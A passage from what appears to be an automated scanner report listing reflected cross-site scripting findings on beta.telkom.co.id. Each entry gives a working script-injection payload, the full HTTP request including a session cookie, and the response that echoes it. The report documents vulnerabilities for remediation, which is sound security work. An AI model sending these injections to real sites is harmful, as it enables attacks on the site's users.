Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:03 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23351
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-mediaf4080<script>alert(1)</script>71eea796522/artikel-infokom/index.html</b>
...[SNIP]...
4.34. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34d55"><script>alert(1)</script>d4049881182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/artikel-infokom34d55"><script>alert(1)</script>d4049881182/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:33:52 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23752
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/artikel-infokom34d55"><script>alert(1)</script>d4049881182/index.html?&lid=en">
...[SNIP]...
4.35. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c5cc1--><script>alert(1)</script>87ec397da79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/artikel-infokomc5cc1--><script>alert(1)</script>87ec397da79/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:34:00 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23755
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/artikel-infokomc5cc1--><script>alert(1)</script>87ec397da79/index.html?&lid=en">
...[SNIP]...
4.36. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e31b<script>alert(1)</script>d300cf6ec0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/artikel-infokom2e31b<script>alert(1)</script>d300cf6ec0e/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:33:55 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/artikel-infokom2e31b<script>alert(1)</script>d300cf6ec0e/index.html</b>
...[SNIP]...
4.37. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ebcf5--><script>alert(1)</script>ef3a5ae96a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediaebcf5--><script>alert(1)</script>ef3a5ae96a6/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:15 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23749
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediaebcf5--><script>alert(1)</script>ef3a5ae96a6/berita-telkom/index.html?&lid=en">
...[SNIP]...
4.38. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19106"><script>alert(1)</script>a76d99c8f5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media19106"><script>alert(1)</script>a76d99c8f5c/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media19106"><script>alert(1)</script>a76d99c8f5c/berita-telkom/index.html?&lid=en">
...[SNIP]...
4.39. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4087<script>alert(1)</script>aa40da893a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediaa4087<script>alert(1)</script>aa40da893a2/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:10 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23345
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-mediaa4087<script>alert(1)</script>aa40da893a2/berita-telkom/index.html</b>
...[SNIP]...
4.40. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60f9c<script>alert(1)</script>8ae36b26f5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/berita-telkom60f9c<script>alert(1)</script>8ae36b26f5d/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:23 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/berita-telkom60f9c<script>alert(1)</script>8ae36b26f5d/index.html</b>
...[SNIP]...
4.41. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d37"><script>alert(1)</script>bbb5636eea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/berita-telkomd1d37"><script>alert(1)</script>bbb5636eea0/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:20 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/berita-telkomd1d37"><script>alert(1)</script>bbb5636eea0/index.html?&lid=en">
...[SNIP]...
4.42. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 1f818--><script>alert(1)</script>468d84d6482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/berita-telkom1f818--><script>alert(1)</script>468d84d6482/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23749
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/berita-telkom1f818--><script>alert(1)</script>468d84d6482/index.html?&lid=en">
...[SNIP]...
4.43. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce78"><script>alert(1)</script>7e6a736b2fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediabce78"><script>alert(1)</script>7e6a736b2fa/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:36 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediabce78"><script>alert(1)</script>7e6a736b2fa/siaran-pers/index.html?&lid=en">
...[SNIP]...
4.44. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cba5e--><script>alert(1)</script>94534c2b59f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediacba5e--><script>alert(1)</script>94534c2b59f/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:49 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23743
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediacba5e--><script>alert(1)</script>94534c2b59f/siaran-pers/index.html?&lid=en">
...[SNIP]...
4.45. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9913e<script>alert(1)</script>9c313f8dfec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media9913e<script>alert(1)</script>9c313f8dfec/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:41 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23734
Content-Type: text/html

